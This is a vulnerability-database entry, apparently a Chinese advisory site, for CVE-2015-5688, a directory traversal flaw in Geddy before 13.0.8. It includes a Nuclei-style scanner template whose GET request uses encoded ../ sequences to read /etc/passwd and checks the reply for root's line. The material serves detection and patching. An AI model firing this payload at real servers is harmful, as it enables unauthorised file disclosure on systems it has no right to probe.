CVE-2015-5688: Geddy <13.0.8 - Local File Inclusion

日期: 2025-08-01 | 影响软件: Geddy | POC: 已公开

漏洞描述

Geddy prior to version 13.0.8 contains a directory traversal vulnerability in lib/app/index.js that allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.

PoC代码[已公开]

id: CVE-2015-5688

info:
  name: Geddy <13.0.8 - Local File Inclusion
  author: pikpikcu
  severity: medium
  description: Geddy prior to version 13.0.8 contains a directory traversal vulnerability in lib/app/index.js  that allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.
  impact: |
    The vulnerability can be exploited to read sensitive files, execute arbitrary code, or gain unauthorized access to the system.
  remediation: |
    Upgrade Geddy to version 13.0.8 or later to mitigate the vulnerability.
  reference:
    - https://nodesecurity.io/advisories/geddy-directory-traversal
    - https://github.com/geddy/geddy/issues/697
    - https://github.com/geddy/geddy/commit/2de63b68b3aa6c08848f261ace550a37959ef231
    - https://nvd.nist.gov/vuln/detail/CVE-2015-5688
    - https://github.com/geddy/geddy/pull/699
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2015-5688
    cwe-id: CWE-22
    epss-score: 0.69364
    epss-percentile: 0.98575
    cpe: cpe:2.3:a:geddyjs:geddy:13.0.7:*:*:*:*:node.js:*:*
  metadata:
    max-request: 1
    vendor: geddyjs
    product: geddy
    framework: node.js
  tags: cve2015,cve,geddy,lfi,geddyjs,node.js,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c8348fd69f3d86c6085d11bbd0b1621e65291daf5c3b02c7cdf474e1955fd41102200383d07d49d849e7bf95d8b001988100ac9d870bb47d81cdeaf0e488e48762e2:922c64590222798bb761d5b6d8e72950

相关漏洞推荐